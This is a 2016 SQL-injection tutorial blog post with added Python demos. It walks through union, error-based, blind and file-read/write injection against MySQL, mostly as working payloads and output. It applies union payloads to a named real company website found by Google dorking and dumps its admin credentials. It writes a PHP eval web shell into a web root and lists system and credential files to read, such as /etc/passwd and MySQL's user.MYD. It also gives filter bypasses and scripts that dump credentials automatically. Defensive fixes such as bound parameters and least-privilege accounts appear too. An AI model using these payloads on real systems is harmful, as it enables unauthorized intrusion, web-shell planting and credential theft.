The Road to Penetration Testing, Web Vulnerabilities Part 1: SQL Injection in MySQL

MySQL injection techniques

The main ones are: union injection, insert/update injection, delete injection, HTTP header injection, error-based injection (via functions), blind injection (boolean-based), blind injection (time-based), wide-byte injection, second-order injection, and so on.

Characteristics of MySQL

MySQL 5.0 and later can be injected by hand: from 5.0 on the information_schema database exists, so table and column names can be queried directly instead of guessed. Below 5.0 there is no information_schema and names have to be brute-forced (for example with Burp).

Useful query functions and variables:

database(): current database name

version(): database version (same as @@version)

user(): the MySQL account the application connects as

@@version_compile_os: the operating system the server was built for

system_user(): in MySQL this is a synonym for user(), i.e. the MySQL account, not the operating-system user

@@datadir: data directory

@@basedir: installation directory

information_schema columns used below:

table_schema: database name

table_name: table name

column_name: column name

information_schema.tables: the table that lists every table in every database on the server

information_schema.columns: the table that lists every column of every table on the server

information_schema: a database built into MySQL 5.0 and later that holds the names of all databases, tables and columns on the server. It only shows objects the connecting account has privileges on, so a low-privilege site account sees little beyond its own database.

 

Union injection

1. Rules

Rule one: in a single SELECT, the number n in ORDER BY n must not exceed the number of columns the query returns, otherwise MySQL raises "Unknown column 'n' in 'order clause'".

Rule two: the two SELECT statements joined by UNION must return the same number of columns, otherwise MySQL raises "The used SELECT statements have a different number of columns".

2. Method

Use ORDER BY n to find how many columns the main query has (the largest n that does not error), then append UNION SELECT 1,2,...,n and note which numbers are echoed on the page. Replace those numbers with the expressions or columns you want to read.

 

 

 

 

3. Hands-on injection

1. Determine the number of columns in the main query: 2

Error shown when the count is wrong: The used SELECT statements have a different number of columns

2. Confirm that the database name is pikachu

vince' union select Database(),Version()#

 

3. Get the table names of the pikachu database

vince' union select table_schema, table_name from information_schema.tables where table_schema='pikachu' #

your uid:1
your email is: vince@pikachu.com

your uid:pikachu
your email is: httpinfo

your uid:pikachu
your email is: member

your uid:pikachu
your email is: message

your uid:pikachu
your email is: users

your uid:pikachu
your email is: xssblind

4. Get the column names of the users table

xxx'union select table_name,column_name from information_schema.columns where table_name='users' #

Note that this filters on table_name only, so the output below also contains the columns of a same-named users table in another database on the same server (user_id, first_name, last_name, ... do not belong to pikachu). Add and table_schema='pikachu' to the WHERE clause to see only the pikachu columns.

your uid:users
your email is: user_id

your uid:users
your email is: first_name

your uid:users
your email is: last_name

your uid:users
your email is: user

your uid:users
your email is: password

your uid:users
your email is: avatar

your uid:users
your email is: last_login

your uid:users
your email is: failed_login

your uid:users
your email is: id

your uid:users
your email is: username

your uid:users
your email is: level

your uid:users
your email is: name

5. Finally, read the column values

xxx'union select username ,password from users #

The password values returned below are unsalted 32-hex-character MD5 hashes.

your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03
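The five steps above, automated end to end, as an added example that is not part of the original post. SQLite stands in for MySQL so it runs offline: sqlite_master plays the role of information_schema.tables/columns, the member and users tables and their rows are constructed sample data modelled on the pikachu output above, and the comment marker is "--" because SQLite does not accept MySQL's "#".

```python
import sqlite3


def build_db():
    """Constructed sample data standing in for the pikachu database. SQLite is
    used so the example runs offline; sqlite_master plays the role that
    information_schema.tables/columns play in MySQL."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE member(uid INTEGER, username TEXT, email TEXT);
        INSERT INTO member VALUES (1, 'vince', 'vince@pikachu.com'),
                                  (2, 'allen', 'allen@pikachu.com');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e'),
                                 ('test',  'e99a18c428cb38d5f260853678922e03');
    """)
    return con


def vulnerable_lookup(con, username):
    """The application's query: the input is concatenated into the SQL text,
    which is the injection sink. Like the page's form it echoes two columns."""
    sql = f"SELECT uid, email FROM member WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def count_columns(con, max_cols=10):
    """Rule one: ORDER BY n is rejected once n exceeds the number of columns the
    original SELECT returns, so the first failing n minus one is the count.
    (MySQL says "Unknown column '3' in 'order clause'"; SQLite says the term is
    out of range.)"""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(con, f"vince' ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_mismatch_error(con):
    """What rule two looks like when violated: the page's step 1 produced
    'The used SELECT statements have a different number of columns'."""
    try:
        vulnerable_lookup(con, "xxx' UNION SELECT 1 --")
    except sqlite3.OperationalError as e:
        return str(e)
    return ""


def union_extract(con, ncols, expr, source):
    """Rule two: the injected SELECT must return exactly ncols columns, so the
    expression of interest goes in column 1 and the rest are padded with
    literals. 'xxx' matches no real row, so only injected rows come back."""
    pad = "".join(f", {i}" for i in range(2, ncols + 1))
    payload = f"xxx' UNION SELECT {expr}{pad} FROM {source} --"
    return [row[0] for row in vulnerable_lookup(con, payload)]


def dump_credentials(con):
    """Steps 1 to 5: column count, table names, column names (read from the
    stored CREATE statement), then the credentials, joined with || as
    concat() would do in MySQL."""
    ncols = count_columns(con)
    tables = union_extract(con, ncols, "name", "sqlite_master WHERE type = 'table'")
    users_ddl = union_extract(con, ncols, "sql", "sqlite_master WHERE name = 'users'")
    creds = union_extract(con, ncols, "username || ':' || password", "users")
    return ncols, sorted(tables), users_ddl[0], sorted(creds)


if __name__ == "__main__":
    print(dump_credentials(build_db()))
```

Against MySQL the only changes are the comment marker ("#" or "-- ") and the sources (information_schema.tables with a table_schema filter, information_schema.columns with both table_schema and table_name filters); the column-count loop and the padding logic are identical.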

Error-based injection via functions

1. Background

MySQL has no separate boolean type: TRUE and FALSE are stored as 1 and 0.

1. Prerequisite: the back end does not suppress database error messages, so a syntax or runtime error is printed to the front end.

2. Principle: certain MySQL functions can be made to raise an error whose message contains attacker-chosen data. SELECT, INSERT, UPDATE and DELETE injection points can all leak data this way, which matters when the query result is never displayed (an INSERT has nothing to echo).

3. Practice: build the SQL at the input according to the type of injection point.

4. Syntax: updatexml() returns a value; 0x7e is the character ~, and concat() joins strings. The ~ makes the second argument an invalid XPath expression, so MySQL raises "XPATH syntax error: '~...'" with the concatenated data inside the message.

updatexml() explained

UPDATEXML(XML_document, XPath_string, new_value);

    First argument: XML_document, a string holding the XML document (called Doc in the text)
    Second argument: XPath_string, an XPath expression; if you are not familiar with XPath, any online tutorial will do
    Third argument: new_value, a string that replaces the data matched by the XPath

Template:

updatexml(1,concat(0x7e,(command)),1)

Caveat: the error message shows only the first 32 characters of the XPath string, so long results must be paged with LIMIT or cut with substr(); that is also why ~ is placed at both ends as a delimiter.

1. Dump the database version
updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

2. Dump the current database user
updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)

3. Dump the database name
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

4. Dump table names
# limit m,n skips the first m rows and returns the next n; increase m to walk through the tables one per request
updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1),0x7e),1)

2. Cases

All of them wrap the value in updatexml(); select, insert, update and delete injection work the same way, so only select and insert are shown here.

select injection

Put the value of interest into updatexml(); the principle is the same for every statement type, so only select is shown.

insert injection

HTTP header injection

Manual testing shows that the header value is injectable.

List the databases

Dump the tables

(every table has an id column)

Dump the columns

Cookie injection

Blind injection

What if the injected statement is executed by the database but nothing it returns reaches us? For example, the application shows a "generic" page, or redirects to one (perhaps the home page). The union and error-based methods above no longer work, and we are left with a single bit per request: whether the page behaved normally or not.

(Boolean-based) (recommended)

Inject a condition; the page shows the normal record when it is true and the generic page when it is false. Automate the guessing with Burp Intruder.

(Time-based)

Principle: when the condition is true the response is delayed, so the delay itself carries the bit; this works even when the true and false pages are identical.

if(condition,sleep(x),null)

Enter: vince' and if(substr(database(),1,1)='p',sleep(5), null)#
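The boolean-blind extraction described above, automated, as an added example that is not part of the original post. The oracle is a constructed stand-in for the vulnerable page (SQLite instead of MySQL so it runs offline, with constructed member and users rows); all the attacker code sees is whether the known record was shown. Instead of guessing each character by equality as in substr(database(),1,1)='p', it binary-searches the code point, which is how blind tools keep the request count down. MySQL uses ascii() where SQLite uses unicode(); everything else is the same.

```python
import sqlite3


class BlindOracle:
    """Constructed stand-in for the vulnerable page: it answers only 'record
    shown' or 'generic page', and counts requests so the cost is visible."""

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        self.con.executescript("""
            CREATE TABLE member(username TEXT, email TEXT);
            INSERT INTO member VALUES ('vince', 'vince@pikachu.com');
            CREATE TABLE users(username TEXT, password TEXT);
            INSERT INTO users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
        """)
        self.requests = 0

    def record_shown(self, username):
        # The sink: the same concatenation as the page's form, but the caller
        # only learns whether a row came back, never its contents.
        self.requests += 1
        sql = f"SELECT email FROM member WHERE username = '{username}'"
        return bool(self.con.execute(sql).fetchall())

    def holds(self, condition):
        # vince' and (condition) --  : the known row appears only when true
        return self.record_shown(f"vince' AND ({condition}) --")


def bsearch(oracle, template, lo, hi):
    """Find the integer v in [lo, hi) given that template.format(n) is true
    exactly when v >= n. Each round halves the interval with one request."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle.holds(template.format(mid)):
            lo = mid
        else:
            hi = mid
    return lo


def blind_extract(oracle, expr, max_len=64):
    """Recover the value of any scalar SQL expression one character at a time:
    first its length, then each code point (about 7 requests per character
    instead of up to 95 equality guesses)."""
    length = bsearch(oracle, f"length(({expr})) >= {{}}", 0, max_len + 1)
    chars = []
    for pos in range(1, length + 1):
        # MySQL equivalent: ascii(substr((expr), pos, 1)) >= n
        code = bsearch(oracle, f"unicode(substr(({expr}), {pos}, 1)) >= {{}}", 0, 128)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    o = BlindOracle()
    pw = blind_extract(o, "SELECT password FROM users WHERE username = 'admin'")
    print(pw, "recovered in", o.requests, "requests")
```

The time-based variant changes only the oracle: holds() would send if((condition),sleep(5),0) and return whether the response took longer than the threshold. SQLite has no sleep(), so that branch is not shown here; the search loop is unchanged.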

 

PHP programming basics

PHP opening and closing tags

Comments (single-line, multi-line)

*Difference between single and double quotes (variables are not interpolated inside single quotes; they are inside double quotes)

*Variable assignment and how request parameters are received

*PHP + MySQL functions

Simulated exercise

The deliberately vulnerable page used in the rest of this section (the mysql_* extension it relies on was removed in PHP 7, so it only runs on PHP 5):

<?php
// x is taken straight from the query string and pasted into the SQL text
$id = $_GET['x'];
$conn = mysql_connect('127.0.0.1','root','root');   // connects as root: every database on the server is in scope
mysql_select_db('fanke',$conn );
$sql = "select * from user where id=$id";           // the injection sink: numeric context, no quotes to break out of
$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
    echo "User ID: ".$row['id']."<br >";
    echo "Username: ".$row['username']."<br >";
    echo "Password: ".$row['password']."<br >";
    echo "<hr>";
}

mysql_close($conn);
echo "<hr>";
echo "you are executing:";   // echoes the final SQL so the demo is easy to follow
echo $sql;

?>

One table of the database (user, in the fanke database)

Detecting the injection

Order by xx to guess the column count (xx<=5 all render normally, so the query has 5 columns)

Union select 1,2,3,4,5 to see which positions are echoed

Query the table names in the database fanke (0x66616E6B65; the hex form needs no quotes, which matters once quotes are escaped or filtered)

http://127.0.0.1/php.php?x=4 union select table_name,2,3,4,5 from information_schema.tables where table_schema=0x66616E6B65

Query the column names of the table user (0x75736572)

http://127.0.0.1/php.php?x=4 union select column_name,2,3,4,5 from information_schema.columns where table_name=0x75736572

Read the data of the user table directly

http://127.0.0.1/php.php?x=4 union select username,password,3,4,5 from user

Fixing the injection:

Restrict the parameter: cast it to the type the query expects ((int)$_GET['x'] for a numeric id) and pass it as a bound parameter of a prepared statement instead of pasting it into the SQL string.

Real-world example

Found via www.google.com.hk

Result: http://www.microtek.com.cn/service2/faq.php?id=31

A negative id makes the original SELECT return nothing, so the union rows are what the page displays:

http://www.microtek.com.cn/service2/faq.php?id=-31 union select Database(),@@version_compile_os

http://www.microtek.com.cn/service2/faq.php?id=-31 union select User(),Version()

Query the table names in the database xbase (0x7862617365, obtained with the Xiaokui conversion tool)

http://www.microtek.com.cn/service2/faq.php?id=-31 union select table_name,2 from information_schema.tables where table_schema=0x7862617365

group_concat() returns all table names in one row, so a single request is enough:

http://www.microtek.com.cn/service2/faq.php?id=-31 union select group_concat(table_name),2 from information_schema.tables where table_schema=0x7862617365

Found: database xbase (0x7862617365), table admin (0x61646D696E)

Get the column names of the admin table

http://www.microtek.com.cn/service2/faq.php?id=-31 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E

Read the data of the admin table directly, one row per request with LIMIT

http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT admin_firstname,admin_password from admin

http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT admin_firstname,admin_password from admin limit 0,1

http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT admin_firstname,admin_password from admin limit 1,1

http://www.microtek.com.cn/service2/faq.php?id=-31 UNION SELECT admin_firstname,admin_password from admin limit 2,1

 

MySQL file operations

Prerequisites: the injection runs as an account with the FILE privilege (in practice root); the file functions are not disabled; the target path is known.

Workflow: find an injection point running as root -> find the web root path -> read or write files

Conclusion: in MySQL only accounts holding the FILE privilege can read or write files on the server; an ordinary site account cannot. Since MySQL 5.7.6 the secure_file_priv variable additionally confines load_file() and INTO OUTFILE to one directory by default, or disables them entirely when it is NULL; check it with select @@secure_file_priv before spending time on this.

The account to check is the one the page code uses for its database connection: that is the account the injection runs as.

File read: load_file()

File write: into outfile

Note: use forward slashes "/" in paths; if you use backslashes "\", each one must be doubled as "\\".

How to find the site's absolute path?

1. Error messages that display it

2. Leftover files (phpinfo.php)

3. Social engineering (dictionary guessing, Google hacking, etc.)

site: edu.cn warning

4. Vulnerabilities that disclose the path

CMS vulnerabilities

5. Reading the platform's configuration files

Testing file read/write at the injection point

Note: with single quotes the path needs no encoding; with hex encoding no quotes are needed.

Read statement (the hex decodes to D:\\APMServ5.2.6\\www\\htdocs\\sql.php):

http://127.0.0.1/sql.php?x=4%20UNION SELECT load_file(0x443A5C5C41504D53657276352E322E365C5C7777775C5C6874646F63735C5C73716C2E706870),2,3,4,5

Write statement (drops a one-line PHP web shell into the web root; the directory must be writable by the mysqld OS user, and the file must not already exist because INTO OUTFILE refuses to overwrite):

http://127.0.0.1/sql.php?x=4 UNION SELECT '<?php eval($_POST[a])?>',2,3,4,5 into outfile 'D:\\APMServ5.2.6\\www\\htdocs\\yijuhua1.php'

 

Commonly useful targets for load_file()

1. replace(load_file(0x2F6574632F706173737764),0x3c,0x20)

2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
Both of these read /etc/passwd, with the path written in hex and in char() form respectively. The replace() swaps "<" for a space: when reading a PHP file, without that substitution the browser renders the tags as HTML and the source code is not visible.

3. load_file(char(47)) can list the root directory on FreeBSD and SunOS

4. /etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf: Apache virtual host configuration on Linux

5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf: Apache configuration on Windows

6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration of a JSP site

7. c:/Resin/conf/resin.conf, /usr/local/resin/conf/resin.conf: JSP virtual host configuration on Linux

8. d:\APACHE\Apache2\conf\httpd.conf

9. C:\Program Files\mysql\my.ini

10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure

11. c:\windows\system32\inetsrv\MetaBase.xml: IIS virtual host configuration

12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration

13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above

14. /usr/local/app/apache2/conf/extratpd-vhosts.conf: Apache virtual hosts

15. /etc/sysconfig/iptables: firewall policy

16. /usr/local/app/php5 b/php.ini: PHP settings

17. /etc/my.cnf: MySQL configuration file

18. /etc/redhat-release: Red Hat release version

19. C:\mysql\data\mysql\user.MYD: MySQL account password hashes

20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address

21. c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

22. c:\windows\my.ini

23. /etc/issue: Linux distribution release information

24. /etc/ftpuser

25. .bash_history or .bash_profile in a Linux user's home directory: command history

26. /etc/ssh/ssh_config

Web server log files (the ../ variants are for path traversal rather than load_file(), which needs an absolute path):


/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/etc/mail/access
/etc/my.cnf
/var/run/utmp
/var/log/wtmp


../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

 

PHP + MySQL injection defences and bypasses

Keyword filtering (regular expressions)

Checking the parameter type (type functions)

Behavioural checks

1. Keyword filtering

1.1 Escaping functions

addslashes()

Escapes single quotes, double quotes, backslashes and NUL bytes by prefixing each with a backslash. This only protects values placed inside quotes: a numeric context such as where id=$id has no quote to break out of and is unaffected.

1.2 php.ini setting

magic_quotes_gpc (magic quotes): applies addslashes() to all GET/POST/COOKIE input automatically. It was deprecated in PHP 5.3 and removed in PHP 5.4, so it cannot be relied on.

1.3 Keyword blacklisting

$x = str_replace("union","x",$_GET['id']);//keyword filtering

str_replace() is case-sensitive, so UNION or uNiOn passes through untouched.

2. Checking the parameter type

if(is_numeric($x)){}

Bypass ideas

1. Encoding bypasses (the main one): change the case, or use URL, hex or inline-comment (/*!union*/) forms that the filter does not normalise before comparing

2. Wide-byte injection (rarely usable): with a GBK connection, input %bf%27 becomes %bf%5c%27 after addslashes(), and 0xBF5C is a valid two-byte GBK character, so the quote survives on its own
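The vulnerable query from the php.php exercise, the str_replace("union","x") filter, and the parameter restriction recommended as the fix, side by side, as an added example that is not part of the original post. It is Python with SQLite standing in for PHP and MySQL so it runs offline; the user table and its rows are constructed sample data, and Python's str.replace() mirrors PHP's str_replace(), including its case-sensitivity.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the fanke.user table of the php.php demo."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user(id INTEGER, username TEXT, password TEXT);
        INSERT INTO user VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e'),
                                (4, 'fanke', '670b14728ad9902aecba32e22fa4f6bd');
    """)
    return con


def lookup_vulnerable(con, x):
    """Mirrors "select * from user where id=$id": numeric context, no quotes,
    so addslashes()/magic quotes would not help here at all."""
    return con.execute(f"SELECT id, username, password FROM user WHERE id={x}").fetchall()


def keyword_filter(x):
    """The page's str_replace("union","x",...) defence; case-sensitive like PHP's."""
    return x.replace("union", "x")


def lookup_filtered(con, x):
    """The vulnerable lookup behind the keyword filter. Returns None when the
    mangled query is a syntax error, i.e. the filter 'worked'."""
    try:
        return lookup_vulnerable(con, keyword_filter(x))
    except sqlite3.OperationalError:
        return None


def lookup_fixed(con, x):
    """Proper restriction of the parameter: validate the type the query needs,
    then bind it as a value so it can never be parsed as SQL
    (PHP: (int)$_GET['x'], or a PDO/mysqli prepared statement)."""
    if not re.fullmatch(r"[0-9]+", x):
        raise ValueError("id must be a non-negative integer")
    return con.execute("SELECT id, username, password FROM user WHERE id=?", (int(x),)).fetchall()


def fixed_rejects(con, x):
    """True when the hardened lookup refuses the input instead of running it."""
    try:
        lookup_fixed(con, x)
    except ValueError:
        return True
    return False


# The page's payload, adapted to this table's three columns.
PAYLOAD = "4 union select username,password,3 from user"


if __name__ == "__main__":
    con = build_db()
    print(lookup_vulnerable(con, PAYLOAD))         # every credential row leaks
    print(lookup_filtered(con, PAYLOAD))           # None: lowercase union mangled
    print(lookup_filtered(con, PAYLOAD.upper()))   # filter bypassed by case
    print(fixed_rejects(con, PAYLOAD), lookup_fixed(con, "4"))
```

The fixed version rejects the payload before any SQL is built; the filter only turns the lowercase payload into a syntax error and is defeated by the first bypass idea above, changing the case.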

PHP + MySQL advanced injection statements explained

(dumping databases, information gathering, etc.)

Experiment: test what different database accounts are allowed to do

root: administers every database on the server, with full rights (read, write, delete, modify, etc.) on each of them

test: a per-application account that manages only its own database and has no rights over the others

Scenarios for real engagements:

1. A server hosts several PHP + MySQL sites, all of which connect to the database as root

MySQL

Dedecms

Discuz

WordPress     connect as root

Phpcms

Phpweb

An injection in any one of these sites exposes every other site's database, and file read/write becomes possible.

2. A server hosts several PHP + MySQL sites, each connecting as its own ordinary account

MySQL

Dedecms    connects as dede_xxxxx

Discuz      connects as dz_xxxxx

WordPress   connects as wp_xxx

Phpcms     ......

Phpweb     .......

An injection in one site reaches only that site's database; the others are out of scope. This is the least-privilege setup to aim for.

Learning advanced injection by proxying an injection tool through Burp Suite (learn from the tool's requests)

+ stands for a space (URL encoding)

Statement that lists all databases on the server, as captured from the tool: union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 0,1),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--

Here limit x,1 returns the next database name as x is increased; the 0x3130... constants are recognisable literals the tool uses to pad the remaining columns and to locate its own output in the response.

 

PHP + MySQL injection: closing notes

1. Sometimes none of the numbers from union select show up on the page?

www.xxx.com/news.php?id=1

Make the original query return no rows, so the union rows are what gets displayed: www.xxx.com/news.php?id=-1, or append a false condition such as and 1=11

2. Only one table or column name shows up?

Group_concat(table_name) Group_concat(column_name) collapse all of them into a single row

www.xxx.com/new.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7... From .....

3. Need more than the first account's username and password? Page through the rows with LIMIT:

www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin

www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 0,1

www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 1,1

www.xxx.com/new.php?id=-1 union select 1,2,username,password,5,6.. From admin limit 2,1

posted @ 2016-03-01 17:15  沐风先生  views (3774)  comments (0)